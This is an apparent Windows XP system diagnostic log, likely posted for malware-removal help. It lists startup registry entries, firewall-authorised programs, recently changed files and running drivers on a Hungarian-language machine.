[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"nwiz"=nwiz.exe /install []
"ZoneAlarm Client"=C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe [2008-08-21 981904]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2006-06-28 16248320]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-12-03 13680640]
"egui"=C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2008-10-24 1451264]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]
"RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe [2008-12-29 306088]
"msnmsgr"=C:\Program Files\Windows Live\Messenger\msnmsgr.exe [2007-10-18 5724184]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\InCD]
C:\Program Files\Ahead\InCD\InCD.exe [2004-02-10 1261672]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
C:\Program Files\Messenger\msmsgs.exe [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
C:\Program Files\QuickTime\qttask.exe [2007-10-19 286720]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2006-05-23 402736]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll [2006-10-18 133632]
UPnPMonitor - {e57ce738-33e8-4c51-8354-bb4de9d215d1} - C:\WINDOWS\system32\upnpui.dll [2008-04-14 239616]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\vsmon]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe"="C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe:*:Enabled:Rockstar Games Social Club"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\LaunchGTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe"="C:\Program Files\Rockstar Games\Grand Theft Auto IV\GTAIV.exe:*:Enabled:Grand Theft Auto IV"
"C:\Program Files\Totalcmd\TOTALCMD.EXE"="C:\Program Files\Totalcmd\TOTALCMD.EXE:*:Enabled:Total Commander 32 bit international version, file manager replacement for Windows"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"
"C:\WINDOWS\system32\spoolsv.exe"="C:\WINDOWS\system32\spoolsv.exe:*:Enabled:Spooler SubSystem App"
"C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpofxm08.exe:*:Enabled:hpofxm08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe"="C:\Program Files\HP\Digital Imaging\bin\hposfx08.exe:*:Enabled:hposfx08.exe"
"C:\Program Files\HP\Digital Imaging\bin\hposid01.exe"="C:\Program Files\HP\Digital Imaging\bin\hposid01.exe:*:Enabled:hposid01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqscnvw.exe:*:Enabled:hpqscnvw.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe:*:Enabled:hpqkygrp.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqCopy.exe:*:Enabled:hpqcopy.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpzwiz01.exe:*:Enabled:hpzwiz01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe"="C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe:*:Enabled:hpoews01.exe"
"C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe"="C:\Program Files\HP\Digital Imaging\bin\hpqnrs08.exe:*:Enabled:hpqnrs08.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMC.exe"="C:\Program Files\Pinnacle\MediaCenter\PMC.exe:LocalSubNet:Enabled:Pmc.exe"
"C:\Program Files\Pinnacle\MediaCenter\PSST.exe"="C:\Program Files\Pinnacle\MediaCenter\PSST.exe:LocalSubNet:Enabled:PSST.exe"
"C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe"="C:\Program Files\Pinnacle\MediaCenter\PMSInstallInit.exe:LocalSubNet:Enabled:PMSInstallInit.exe"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaManager\PMSManager.exe:LocalSubNet:Enabled:PMSManager.exe"
"C:\Program Files\uTorrent\uTorrent.exe"="C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent"
"C:\WINDOWS\system32\PnkBstrA.exe"="C:\WINDOWS\system32\PnkBstrA.exe:*:Enabled:PnkBstrA"
"C:\WINDOWS\system32\PnkBstrB.exe"="C:\WINDOWS\system32\PnkBstrB.exe:*:Enabled:PnkBstrB"
"C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe"="C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\iw3mp.exe:*:Enabled:Call of Duty(R) 4 - Modern Warfare(TM) "
"C:\Program Files\Messenger\msmsgs.exe"="C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger"
"C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe"="C:\Program Files\Sony Ericsson\Sony Ericsson Media Manager\MediaManager.exe:*:Enabled:Sony Ericsson Media Manager 1.1"
"C:\Program Files\LimeWire\LimeWire.exe"="C:\Program Files\LimeWire\LimeWire.exe:*:Enabled:LimeWire"
"C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe"="C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe:*:Enabled:kfwserv"
"C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe"="C:\Program Files\Pinnacle\Shared Files\Programs\MediaCenterService\PMC.Service.Main.exe:LocalSubNet:Disabled:PMCService"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Windows Live\Messenger\livecall.exe"="C:\Program Files\Windows Live\Messenger\livecall.exe:*:Enabled:Windows Live Messenger (Phone)"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}]
shell\AutoRun\command - J:\setup.exe AUTORUN=1


======List of files/folders created in the last 1 months======

2009-05-29 12:37:36 ----A---- C:\WINDOWS\system32\h323log.txt
2009-05-29 12:33:50 ----A---- C:\WINDOWS\system32\hidserv.dll
2009-05-29 12:33:22 ----A---- C:\WINDOWS\system32\ksuser.dll
2009-05-29 12:32:09 ----A---- C:\WINDOWS\system32\usbui.dll
2009-05-29 12:31:03 ----SHD---- C:\WINDOWS\Installer
2009-05-29 12:31:03 ----D---- C:\Program Files\Common Files\ODBC
2009-05-29 12:31:03 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-05-29 12:31:03 ----A---- C:\WINDOWS\ODBCINST.INI
2009-05-29 12:30:57 ----D---- C:\Program Files\Common Files\SpeechEngines
2009-05-29 12:30:56 ----RD---- C:\Program Files
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-05-29 12:30:56 ----D---- C:\Program Files\Common Files
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuq.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdtuf.dll
2009-05-29 12:30:52 ----RA---- C:\WINDOWS\system32\kbdazel.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbduzb.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdtat.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdmon.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkyr.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdkaz.dll
2009-05-29 12:30:48 ----RA---- C:\WINDOWS\system32\kbdaze.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdycc.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdur.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru1.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdru.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdbu.dll
2009-05-29 12:30:47 ----RA---- C:\WINDOWS\system32\kbdblr.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhept.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela3.dll
2009-05-29 12:30:44 ----RA---- C:\WINDOWS\system32\kbdhela2.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe319.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe220.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdhe.dll
2009-05-29 12:30:43 ----RA---- C:\WINDOWS\system32\kbdgkl.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlv1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt1.dll
2009-05-29 12:30:41 ----RA---- C:\WINDOWS\system32\kbdlt.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdlv.dll
2009-05-29 12:30:40 ----RA---- C:\WINDOWS\system32\kbdest.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl1.dll
2009-05-29 12:30:35 ----A---- C:\WINDOWS\system32\kbdsl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdycl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdro.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz2.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcr.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\KBDAL.DLL
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\irclass.dll
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\dgrpsetu.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\spxcoins.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\EqnClass.Dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\dgsetup.dll
2009-05-29 12:30:28 ----N---- C:\WINDOWS\system32\CONFIG.TMP
2009-05-29 12:30:28 ----A---- C:\WINDOWS\TASKMAN.EXE
2009-05-29 12:30:27 ----A---- C:\WINDOWS\system32\batt.dll
2009-05-29 12:30:27 ----A---- C:\WINDOWS\notepad.exe
2009-05-29 12:30:26 ----A---- C:\WINDOWS\system32\storprop.dll
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3D.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3C.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3B.tmp
2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\All Users\Application Data\desktop.ini
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET3A.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET39.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET38.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET37.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET36.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET35.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET34.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET33.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET32.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET31.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET30.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2F.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2E.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2D.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2C.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2B.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2A.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET29.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET28.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET27.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET26.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET25.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET24.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET23.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET22.tmp
2009-05-29 12:30:15 ----RA---- C:\WINDOWS\SET21.tmp
2009-05-29 12:30:12 ----RA---- C:\WINDOWS\SET8.tmp
2009-05-29 12:30:08 ----RA---- C:\WINDOWS\SET4.tmp
2009-05-29 12:30:07 ----RA---- C:\WINDOWS\SET3.tmp
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot2
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot
2009-05-29 12:29:57 ----SD---- C:\Documents and Settings\All Users\Application Data\Microsoft
2009-05-29 12:29:24 ----D---- C:\Documents and Settings
2009-05-29 12:28:33 ----SHD---- C:\System Volume Information
2009-05-29 12:28:33 ----SH---- C:\boot.ini
2009-05-29 12:18:18 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-05-29 12:18:18 ----RSD---- C:\WINDOWS\Fonts
2009-05-29 12:18:18 ----RD---- C:\WINDOWS\Web
2009-05-29 12:18:18 ----HD---- C:\WINDOWS\inf
2009-05-29 12:18:18 ----D---- C:\WINDOWS\WinSxS
2009-05-29 12:18:18 ----D---- C:\WINDOWS\twain_32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wins
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wbem
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\usmt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\spool
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ShellExt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\Setup
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ras
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\oobe
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\npp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\inetsrv
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\IME
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\icsxml
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ias
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\export
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\drivers
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\dhcp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3com_dmi
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3076
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\2052
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1054
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1042
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1041
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1038
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1037
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1033
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1031
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1028
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1025
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system
2009-05-29 12:18:18 ----D---- C:\WINDOWS\security
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Resources
2009-05-29 12:18:18 ----D---- C:\WINDOWS\repair
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Provisioning
2009-05-29 12:18:18 ----D---- C:\WINDOWS\PeerNet
2009-05-29 12:18:18 ----D---- C:\WINDOWS\pchealth
2009-05-29 12:18:18 ----D---- C:\WINDOWS\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msapps
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msagent
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Media
2009-05-29 12:18:18 ----D---- C:\WINDOWS\java
2009-05-29 12:18:18 ----D---- C:\WINDOWS\ime
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Help
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Driver Cache
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Debug
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Cursors
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Connection Wizard
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\AppPatch
2009-05-29 12:18:18 ----D---- C:\WINDOWS\addins
2009-05-29 12:18:18 ----D---- C:\WINDOWS
2009-05-23 13:53:48 ----D---- C:\Program Files\trend micro
2009-05-23 13:47:26 ----A---- C:\Új Szöveges dokumentum.txt
2009-05-23 13:40:22 ----D---- C:\rsit
2009-05-23 11:46:55 ----A---- C:\WINDOWS\ntbtlog.txt
2009-05-22 20:51:55 ----A---- C:\WINDOWS\imsins.BAK
2009-05-22 20:41:54 ----D---- C:\Program Files\NT Registry Optimizer
2009-05-22 20:40:02 ----SHD---- C:\RECYCLER
2009-05-22 20:35:17 ----SD---- C:\ComboFix
2009-05-22 18:15:45 ----D---- C:\WINDOWS\temp
2009-05-20 21:23:49 ----D---- C:\Program Files\HijackThis
2009-05-19 17:04:37 ----D---- C:\Program Files\NCH Software
2009-05-19 16:42:24 ----D---- C:\Documents and Settings\Zsombor\Application Data\NCH Swift Sound
2009-05-19 16:08:49 ----D---- C:\Program Files\NCH Swift Sound
2009-05-14 14:09:58 ----D---- C:\Program Files\Microsoft Virtual PC
2009-05-10 20:18:00 ----A---- C:\WINDOWS\system32\PY_Uninstal.exe
2009-05-05 00:31:21 ----D---- C:\Program Files\webcamXP
2009-05-05 00:30:05 ----D---- C:\Documents and Settings\All Users\Application Data\WebacamSurveyor
2009-05-05 00:29:44 ----D---- C:\Program Files\Webcam Surveyor
2009-05-05 00:14:18 ----A---- C:\WINDOWS\system32\wmvdmoe.dll
2009-05-05 00:14:13 ----D---- C:\Documents and Settings\All Users\Application Data\PY_Software
2009-05-05 00:13:52 ----D---- C:\Program Files\Active WebCam
2009-05-04 12:21:22 ----D---- C:\Program Files\Noel Danjou
2009-04-27 19:50:53 ----N---- C:\WINDOWS\NuNinst.exe
2009-04-27 19:50:51 ----D---- C:\WINDOWS\InCD
2009-04-24 19:12:43 ----A---- C:\WINDOWS\myip.ini
2009-04-24 19:03:11 ----D---- C:\Program Files\KeyFocus

======List of files/folders modified in the last 1 months======

2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\Zsombor\Application Data\desktop.ini
2009-05-23 13:54:27 ----D---- C:\WINDOWS\Prefetch
2009-05-23 13:52:01 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-05-23 13:49:13 ----D---- C:\WINDOWS\Internet Logs
2009-05-23 12:37:35 ----A---- C:\WINDOWS\wincmd.ini
2009-05-23 12:36:22 ----A---- C:\WINDOWS\wcx_ftp.ini
2009-05-23 10:38:30 ----D---- C:\Documents and Settings\Zsombor\Application Data\LimeWire
2009-05-22 23:29:02 ----A---- C:\WINDOWS\win.ini
2009-05-22 20:43:32 ----D---- C:\WINDOWS\system32\LogFiles
2009-05-22 20:36:39 ----D---- C:\WINDOWS\system32\Restore
2009-05-22 20:15:51 ----D---- C:\Program Files\Opera
2009-05-22 20:11:45 ----D---- C:\Program Files\Windows Media Player
2009-05-22 20:11:43 ----D---- C:\WINDOWS\RegisteredPackages
2009-05-22 19:54:10 ----A---- C:\checkrun.txt
2009-05-22 18:21:27 ----A---- C:\WINDOWS\system.ini
2009-05-20 21:16:59 ----HD---- C:\Config.Msi
2009-05-20 21:11:02 ----D---- C:\Program Files\Adobe
2009-05-20 20:50:53 ----D---- C:\Program Files\Common Files\Adobe
2009-05-19 21:06:37 ----D---- C:\Documents and Settings\All Users\Application Data\FLEXnet
2009-05-19 18:04:20 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-05-17 19:01:01 ----D---- C:\WINDOWS\Minidump
2009-05-14 21:30:30 ----D---- C:\WINDOWS\Registration
2009-05-14 20:15:13 ----A---- C:\WINDOWS\NeroDigital.ini
2009-05-08 22:01:34 ----A---- C:\WINDOWS\system32\DivXEncSettings.txt
2009-04-28 21:43:12 ----D---- C:\Program Files\uTorrent
2009-04-27 22:07:00 ----SD---- C:\WINDOWS\Tasks
2009-04-27 19:50:51 ----D---- C:\Program Files\Ahead

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 easdrv;easdrv; C:\WINDOWS\system32\DRIVERS\easdrv.sys [2008-10-24 53256]
R1 epfwtdir;epfwtdir; C:\WINDOWS\system32\DRIVERS\epfwtdir.sys [2008-10-24 34824]
R1 InCDPass;InCDPass; C:\WINDOWS\System32\DRIVERS\InCDPass.sys [2004-02-10 27408]
R1 intelppm;Intel processzor illesztőprogramja; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 40576]
R1 kbdhid;Billentyűzet HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14720]
R1 vmm;Virtual Machine Monitor; \??\C:\WINDOWS\system32\Drivers\vmm.sys []
R1 vsdatant;vsdatant; C:\WINDOWS\System32\vsdatant.sys [2008-08-21 353680]
R2 DLPortIO;DriverLINX Port I/O Driver; \??\C:\WINDOWS\system32\DRIVERS\DLPortIO.SYS []
R2 eamon;EAMON; C:\WINDOWS\system32\DRIVERS\eamon.sys [2008-10-24 39944]
R2 TVicPort;TVICPORT; \??\C:\WINDOWS\system32\DRIVERS\TVICPORT.SYS []
R3 ASAPIW2k;ASAPIW2K; C:\WINDOWS\system32\drivers\ASAPIW2k.sys [2005-05-26 11264]
R3 BthEnum;Bluetooth kérési blokk illesztőprogramja; C:\WINDOWS\system32\DRIVERS\BthEnum.sys [2008-04-13 17024]
R3 BthPan;Bluetooth Device (Personal Area Network); C:\WINDOWS\system32\DRIVERS\bthpan.sys [2008-04-13 101120]
R3 BTHUSB;Bluetooth-rádió USB illesztőprogramja; C:\WINDOWS\System32\Drivers\BTHUSB.sys [2008-04-13 18944]
R3 DCamUSBEMPIA;PCTV USB2 2821 Capture; C:\WINDOWS\system32\DRIVERS\emDevice.sys [2004-04-06 100957]
R3 emAudio;PCTV USB2 2821 Audio; C:\WINDOWS\system32\drivers\emAudio.sys [2004-05-05 19584]
R3 FETND5BV;VIA Rhine-Family Fast Ethernet Adapter Driver Service; C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2005-11-16 42496]
R3 FiltUSBEMPIA;USB Device Lower Filter; C:\WINDOWS\system32\DRIVERS\emFilter.sys [2004-04-06 5245]
R3 HDAudBus;Microsoft UAA busz-illesztőprogram - High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 hidusb;Microsoft HID osztályú illesztőprogram; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2006-06-28 4304384]
R3 LVUSBSta;Logitech USB Monitor Filter; C:\WINDOWS\system32\drivers\lvusbsta.sys [2005-01-31 22016]
R3 mouhid;Egér HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-18 12160]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-12-03 6209536]
R3 pepifilter;Volume Adapter; C:\WINDOWS\system32\DRIVERS\lv302af.sys [2005-01-31 7104]
R3 PID_08A0;QuickCam IM(PID_08A0); C:\WINDOWS\system32\DRIVERS\LV302AV.SYS [2005-01-31 912768]
R3 RFCOMM;Bluetooth-eszköz (RFCOMM protokoll TDI); C:\WINDOWS\system32\DRIVERS\rfcomm.sys [2008-04-13 59136]
R3 ScanUSBEMPIA;USB Still Image Capture Device; C:\WINDOWS\system32\DRIVERS\emScan.sys [2004-04-06 4493]
R3 SNXPCARD;Sunix PCI Multi I/O Card Driver; C:\WINDOWS\system32\DRIVERS\snxpcard.sys [2003-04-03 20864]
R3 SNXPPALX;Sunix PCI Parallel Port Driver; C:\WINDOWS\system32\DRIVERS\snxppalx.sys [2003-04-07 75264]
R3 StillCam;Still Serial digitális fényképezőgép illesztőprogramja; C:\WINDOWS\system32\DRIVERS\serscan.sys [2001-10-26 6912]
R3 usbaudio;USB audio-illesztőprogram (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
R3 usbccgp;Microsoft USB általános szülő-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
R3 usbehci;Microsoft USB 2.0 bővített állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Microsoft USB szabványos hub-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbstor;USB háttértár illesztőprogramja; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
R3 usbuhci;Microsoft USB univerzális állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
R3 VPCNetS2;Virtual Machine Network Services Driver; C:\WINDOWS\system32\DRIVERS\VMNetSrv.sys [2007-01-29 59280]
R4 InCDfs;InCD File System; C:\WINDOWS\system32\drivers\InCDfs.sys [2004-02-10 94320]
